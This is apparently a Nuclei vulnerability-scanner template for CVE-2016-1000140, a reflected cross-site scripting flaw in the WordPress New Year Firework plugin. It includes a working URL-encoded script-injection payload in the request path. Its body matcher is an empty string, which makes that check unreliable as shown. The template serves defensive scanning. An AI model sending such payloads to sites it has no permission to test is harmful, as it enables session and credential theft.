id: CVE-2016-1000140 info: name: WordPress New Year Firework <=1.1.9 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 - https://wordpress.org/plugins/new-year-firework - http://web.archive.org/web/20210123183230/https://www.securityfocus.com/bid/93817/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000140 cwe-id: CWE-79 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/08/12